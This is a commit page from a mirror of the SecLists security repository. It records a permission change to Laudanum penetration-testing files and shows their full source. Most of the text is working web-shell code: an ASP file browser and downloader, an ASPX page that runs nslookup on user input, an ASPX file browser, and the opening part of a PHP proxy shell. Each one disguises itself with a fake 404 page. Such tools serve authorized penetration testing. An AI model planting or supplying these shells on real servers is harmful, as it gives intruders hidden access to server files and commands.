danielmiessler/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2024-09-11 02:45:30 +03:00
Code Issues Projects Releases Wiki Activity

Set file permissions

Browse Source
This commit is contained in:
g0tmi1k 2018-03-05 10:01:10 +00:00
parent 307f703b8f
commit 7018c294f5
13 changed files with 830 additions and 830 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
Web-Shells/WordPress/access.php Normal file → Executable file
View File

0
Web-Shells/laudanum-0.8/CREDITS Executable file → Normal file
View File

0
Web-Shells/laudanum-0.8/GPL Executable file → Normal file
View File

0
Web-Shells/laudanum-0.8/README Executable file → Normal file
View File

358
Web-Shells/laudanum-0.8/asp/file.asp
View File

@ -1,179 +1,179 @@
<%@Language="VBScript"%> <%@Language="VBScript"%>
<%Option Explicit%> <%Option Explicit%>
<%Response.Buffer = True%> <%Response.Buffer = True%>
<% <%
' ******************************************************************************* ' *******************************************************************************
' *** ' ***
' *** Laudanum Project ' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test ' *** A Collection of Injectable Files used during a Penetration Test
' *** ' ***
' *** More information is available at: ' *** More information is available at:
' *** http://laudanum.secureideas.net ' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net ' *** laudanum@secureideas.net
' *** ' ***
' *** Project Leads: ' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net ' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com> ' *** Tim Medin <tim@securitywhole.com>
' *** ' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** ' ***
' *** This file provides access to the file system. ' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com> ' *** Written by Tim Medin <timmedin@gmail.com>
' *** ' ***
' ******************************************************************************** ' ********************************************************************************
' *** This program is free software; you can redistribute it and/or ' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License ' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2 ' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version. ' *** of the License, or (at your option) any later version.
' *** ' ***
' *** This program is distributed in the hope that it will be useful, ' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details. ' *** GNU General Public License for more details.
' *** ' ***
' *** You can get a copy of the GNU General Public License from this ' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple ' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA. ' *** Place - Suite Boston, MA USA.
' *** ' ***
' ***************************************************************************** */ ' ***************************************************************************** */
' ***************** Config entries below *********************** ' ***************** Config entries below ***********************
' Define variables ' Define variables
Dim allowedIPs Dim allowedIPs
Dim allowed Dim allowed
Dim filepath Dim filepath
Dim file Dim file
Dim stream Dim stream
Dim path Dim path
Dim i Dim i
Dim fso Dim fso
Dim folder Dim folder
Dim list Dim list
Dim temppath Dim temppath
' IPs are enterable as individual addresses TODO: add CIDR support ' IPs are enterable as individual addresses TODO: add CIDR support
allowedIPs = "192.168.0.1,127.0.0.1,::1" allowedIPs = "192.168.0.1,127.0.0.1,::1"
' Just in cace you added a space in the line above ' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","") allowedIPs = replace(allowedIPS," ","")
'turn it into an array 'turn it into an array
allowedIPs = split(allowedIPS,",") ' allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed ' make sure the ip is allowed
allowed = 0 allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs) for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1 allowed = 1
exit for exit for
end if end if
next next
' send a 404 if the IP Address is not allowed ' send a 404 if the IP Address is not allowed
if allowed = 0 then if allowed = 0 then
Response.Status = "404 File Not Found" Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End Response.End
end if end if
' create file object for use everywhere ' create file object for use everywhere
set fso = CreateObject("Scripting.FileSystemObject") set fso = CreateObject("Scripting.FileSystemObject")
' download a file if selected ' download a file if selected
filepath = trim(Request.QueryString("file")) filepath = trim(Request.QueryString("file"))
'validate file 'validate file
if len(filepath) > 0 then if len(filepath) > 0 then
if fso.FileExists(filepath) then if fso.FileExists(filepath) then
'valid file 'valid file
Set file = fso.GetFile(filepath) Set file = fso.GetFile(filepath)
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
'Response.AddHeader "Content-Length", file.Size 'Response.AddHeader "Content-Length", file.Size
Response.ContentType = "application/octet-stream" Response.ContentType = "application/octet-stream"
set stream = Server.CreateObject("ADODB.Stream") set stream = Server.CreateObject("ADODB.Stream")
stream.Open stream.Open
stream.Type = 1 stream.Type = 1
Response.Charset = "UTF-8" Response.Charset = "UTF-8"
stream.LoadFromFile(file.Path) stream.LoadFromFile(file.Path)
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
Response.BinaryWrite(stream.Read) Response.BinaryWrite(stream.Read)
stream.Close stream.Close
set stream = Nothing set stream = Nothing
set file = Nothing set file = Nothing
Response.End Response.End
end if end if
end if end if
' begin rendering the page ' begin rendering the page
%> %>
<html> <html>
<head> <head>
<title>Laudanum ASP File Browser</title> <title>Laudanum ASP File Browser</title>
</head> </head>
<body> <body>
<h1>Laudanum File Browser 0.1</h1> <h1>Laudanum File Browser 0.1</h1>
<% <%
' get the path to work with, if it isn't set or valid then start with the web root ' get the path to work with, if it isn't set or valid then start with the web root
' goofy if statement is used since vbscript doesn't use short-curcuit logic ' goofy if statement is used since vbscript doesn't use short-curcuit logic
path = trim(Request.QueryString("path")) path = trim(Request.QueryString("path"))
if len(path) = 0 then if len(path) = 0 then
path = fso.GetFolder(Server.MapPath("\")) path = fso.GetFolder(Server.MapPath("\"))
elseif not fso.FolderExists(path) then elseif not fso.FolderExists(path) then
path = fso.GetFolder(Server.MapPath("\")) path = fso.GetFolder(Server.MapPath("\"))
end if end if
set folder = fso.GetFolder(path) set folder = fso.GetFolder(path)
' Special locations, webroot and drives ' Special locations, webroot and drives
%><b>Other Locations:</b> <% %><b>Other Locations:</b> <%
for each i in fso.Drives for each i in fso.Drives
if i.IsReady then if i.IsReady then
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<% %><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<%
end if end if
next next
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><% %><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
' Information on folder ' Information on folder
%><h2>Listing of: <% %><h2>Listing of: <%
list = split(folder.path, "\") list = split(folder.path, "\")
temppath = "" temppath = ""
for each i in list for each i in list
temppath = temppath & i & "\" temppath = temppath & i & "\"
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <% %><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
next next
%></h2><% %></h2><%
' build table for listing ' build table for listing
%><table> %><table>
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><% <tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
' Parent Path if it exists ' Parent Path if it exists
if not folder.IsRootFolder then if not folder.IsRootFolder then
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><% %><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
end if end if
' Get the folders ' Get the folders
set list = folder.SubFolders set list = folder.SubFolders
for each i in list for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><% %><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
next next
' Get the files ' Get the files
set list = folder.Files set list = folder.Files
for each i in list for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><% %><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
next next
' all done ' all done
%> %>
</table> </table>
<hr/> <hr/>
<address> <address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/> Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address> </address>
</body> </body>
</html> </html>

288
Web-Shells/laudanum-0.8/aspx/dns.aspx
View File

@ -1,144 +1,144 @@
<%@ Page Language="C#"%> <%@ Page Language="C#"%>
<%@ Import Namespace="System" %> <%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body> <html><head><title>Laudanum - DNS</title></head><body>
<script runat="server"> <script runat="server">
/* ***************************************************************************** /* *****************************************************************************
*** ***
*** Laudanum Project *** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.com *** http://laudanum.secureideas.com
*** laudanum@secureideas.com *** laudanum@secureideas.com
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kevin@secureideas.com> *** Kevin Johnson <kevin@secureideas.com>
*** ***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team *** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file provides shell access to DNS on the system. *** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com> *** Written by James Jardine <james@secureideas.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License *** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2 *** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version. *** of the License, or (at your option) any later version.
*** ***
*** This program is distributed in the hope that it will be useful, *** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of *** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details. *** GNU General Public License for more details.
*** ***
*** You can get a copy of the GNU General Public License from this *** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple *** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA. *** Place - Suite 330, Boston, MA 02111-1307, USA.
*** ***
***************************************************************************** */ ***************************************************************************** */
// ********************* Config entries below *********************************** // ********************* Config entries below ***********************************
// IPs are enterable as individual addresses // IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" }; string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
// ***************** No editable content below this line ************************** // ***************** No editable content below this line **************************
string stdout = ""; string stdout = "";
string stderr = ""; string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(','); string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() { void die() {
//HttpContext.Current.Response.Clear(); //HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404; HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found"; HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>"); HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError(); HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End(); HttpContext.Current.Response.End();
} }
void Page_Load(object sender, System.EventArgs e) { void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits // check if the X-Fordarded-For header exits
string remoteIp; string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) { if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress; remoteIp = Request.UserHostAddress;
} else { } else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
} }
bool validIp = false; bool validIp = false;
foreach (string ip in allowedIPs) { foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip)); validIp = (validIp || (remoteIp == ip));
} }
if (!validIp) { if (!validIp) {
die(); die();
} }
string qType = "Any"; string qType = "Any";
bool validType = false; bool validType = false;
if (Request.Form["type"] != null) if (Request.Form["type"] != null)
{ {
qType = Request.Form["type"].ToString(); qType = Request.Form["type"].ToString();
foreach (string s in qtypes) foreach (string s in qtypes)
{ {
if (s == qType) if (s == qType)
{ {
validType = true; validType = true;
break; break;
} }
} }
if (!validType) if (!validType)
qType = "Any"; qType = "Any";
} }
if (Request.Form["query"] != null) if (Request.Form["query"] != null)
{ {
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty); string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0) if(query.Length > 0)
{ {
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query); System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error. // The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true; procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true; procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false; procStartInfo.UseShellExecute = false;
// Do not create the black window. // Do not create the black window.
procStartInfo.CreateNoWindow = true; procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it // Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process(); System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo; p.StartInfo = procStartInfo;
p.Start(); p.Start();
// Get the output and error into a string // Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd(); stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd(); stderr = p.StandardError.ReadToEnd();
} }
} }
} }
</script> </script>
<form method="post"> <form method="post">
QUERY: <input type="text" name="query"/><br /> QUERY: <input type="text" name="query"/><br />
Type: <select name="type"> Type: <select name="type">
<% <%
foreach (string s in qtypes) foreach (string s in qtypes)
{ {
Response.Write("<option value=\"" + s + "\">" + s + "</option>"); Response.Write("<option value=\"" + s + "\">" + s + "</option>");
} }
%> %>
</select> </select>
<input type="submit"><br/> <input type="submit"><br/>
STDOUT:<br/> STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre> <pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/> <br/>
<br/> <br/>
<br/> <br/>
STDERR:<br/> STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre> <pre><% = stderr.Replace("<", "&lt;") %></pre>
</body> </body>
</html> </html>

306
Web-Shells/laudanum-0.8/aspx/file.aspx
View File

@ -1,154 +1,154 @@
<%@ Page Language="C#"%> <%@ Page Language="C#"%>
<%@ Import Namespace="System" %> <%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body> <html><head><title>Laudanum - File</title></head><body>
<script runat="server"> <script runat="server">
/* ***************************************************************************** /* *****************************************************************************
*** ***
*** Laudanum Project *** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.com *** http://laudanum.secureideas.com
*** laudanum@secureideas.com *** laudanum@secureideas.com
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kevin@secureideas.com> *** Kevin Johnson <kevin@secureideas.com>
*** ***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team *** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file allows browsing of the file system *** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com> *** Written by James Jardine <james@secureideas.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License *** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2 *** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version. *** of the License, or (at your option) any later version.
*** ***
*** This program is distributed in the hope that it will be useful, *** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of *** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details. *** GNU General Public License for more details.
*** ***
*** You can get a copy of the GNU General Public License from this *** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple *** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA. *** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */ ********************************************************************************* */
// ********************* Config entries below *********************************** // ********************* Config entries below ***********************************
// IPs are enterable as individual addresses // IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"}; string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
// ***************** No editable content below this line ************************** // ***************** No editable content below this line **************************
bool allowed = false; bool allowed = false;
string dir = ""; string dir = "";
string file = ""; string file = "";
void Page_Load(object sender, System.EventArgs e) void Page_Load(object sender, System.EventArgs e)
{ {
foreach (string ip in allowedIPs) foreach (string ip in allowedIPs)
{ {
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip) if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
{ {
allowed = true; allowed = true;
} }
} }
if (!allowed) if (!allowed)
{ {
die(); die();
} }
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory; //dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath("."); dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : ""; file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0) if (file.Length > 0)
{ {
if (System.IO.File.Exists(file)) if (System.IO.File.Exists(file))
{ {
writefile(); writefile();
} }
} }
} }
void writefile() void writefile()
{ {
Response.ClearContent(); Response.ClearContent();
Response.Clear(); Response.Clear();
Response.ContentType = "text/plain"; Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it. //Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";"); //Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
Response.TransmitFile(file); Response.TransmitFile(file);
Response.Flush(); Response.Flush();
Response.End(); Response.End();
} }
void die() { void die() {
//HttpContext.Current.Response.Clear(); //HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404; HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found"; HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>"); HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError(); HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End(); HttpContext.Current.Response.End();
} }
</script> </script>
<html> <html>
<head></head> <head></head>
<% string[] breadcrumbs = dir.Split('\\'); <% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = ""; string breadcrumb = "";
foreach (string b in breadcrumbs) foreach (string b in breadcrumbs)
{ {
if (b.Length > 0) if (b.Length > 0)
{ {
breadcrumb += b + "\\"; breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>"); Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / "); Response.Write(" / ");
} }
} }
%> %>
<table> <table>
<tr><th>Name</th><th>Date</th><th>Size</th></tr> <tr><th>Name</th><th>Date</th><th>Size</th></tr>
<% <%
try try
{ {
if (System.IO.Directory.Exists(dir)) if (System.IO.Directory.Exists(dir))
{ {
string[] folders = System.IO.Directory.GetDirectories(dir); string[] folders = System.IO.Directory.GetDirectories(dir);
foreach (string folder in folders) foreach (string folder in folders)
{ {
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>"); Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
} }
} }
else else
{ {
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
Response.End(); Response.End();
} }
} }
catch (System.UnauthorizedAccessException ex) catch (System.UnauthorizedAccessException ex)
{ {
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
Response.End(); Response.End();
} }
%> %>
<% <%
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
System.IO.FileInfo[] files = di.GetFiles(); System.IO.FileInfo[] files = di.GetFiles();
foreach (System.IO.FileInfo f in files) foreach (System.IO.FileInfo f in files)
{ {
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>"); Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
} }
%> %>
</table> </table>
</body> </body>
</html> </html>

0
Web-Shells/laudanum-0.8/cfm/shell.cfm Executable file → Normal file
View File

0
Web-Shells/laudanum-0.8/jsp/cmd.war Executable file → Normal file
View File

6
Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF Executable file → Normal file
View File

@ -1,3 +1,3 @@
Manifest-Version: 1.0 Manifest-Version: 1.0
Created-By: 1.6.0_10 (Sun Microsystems Inc.) Created-By: 1.6.0_10 (Sun Microsystems Inc.)

0
Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml Executable file → Normal file
View File

0
Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp Executable file → Normal file
View File

702
Web-Shells/laudanum-0.8/php/proxy.php
View File

@ -1,351 +1,351 @@
<?php <?php
ini_set('session.use_cookies', '0'); ini_set('session.use_cookies', '0');
/* ***************************************************************************** /* *****************************************************************************
*** ***
*** Laudanum Project *** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test *** A Collection of Injectable Files used during a Penetration Test
*** ***
*** More information is available at: *** More information is available at:
*** http://laudanum.secureideas.net *** http://laudanum.secureideas.net
*** laudanum@secureideas.net *** laudanum@secureideas.net
*** ***
*** Project Leads: *** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net *** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com> *** Tim Medin <tim@securitywhole.com>
*** ***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team *** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** ***
******************************************************************************** ********************************************************************************
*** ***
*** This file allows browsing of the file system. *** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com> *** Written by Tim Medin <tim@securitywhole.com>
*** ***
******************************************************************************** ********************************************************************************
*** This program is free software; you can redistribute it and/or *** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License *** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2 *** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version. *** of the License, or (at your option) any later version.
*** ***
*** This program is distributed in the hope that it will be useful, *** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of *** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details. *** GNU General Public License for more details.
*** ***
*** You can get a copy of the GNU General Public License from this *** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple *** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA. *** Place - Suite 330, Boston, MA 02111-1307, USA.
*** ***
***************************************************************************** */ ***************************************************************************** */
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page // TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
// figure out how to reuse sessionid from the remote site // figure out how to reuse sessionid from the remote site
// ***************** Config entries below *********************** // ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support // IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1"); $allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1");
# *********** No editable content below this line ************** # *********** No editable content below this line **************
$allowed = 0; $allowed = 0;
foreach ($allowedIPs as $IP) { foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP) if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1; $allowed = 1;
} }
if ($allowed == 0) { if ($allowed == 0) {
header("HTTP/1.0 404 Not Found"); header("HTTP/1.0 404 Not Found");
die(); die();
} }
/* This error handler will turn all notices, warnings, and errors into fatal /* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */ * errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes /* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case. * error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */ * We do note the error in the output, though. */
if (error_reporting() == 0) { if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n"; $_SESSION['output'] .= $errstr . "\n";
} else { } else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
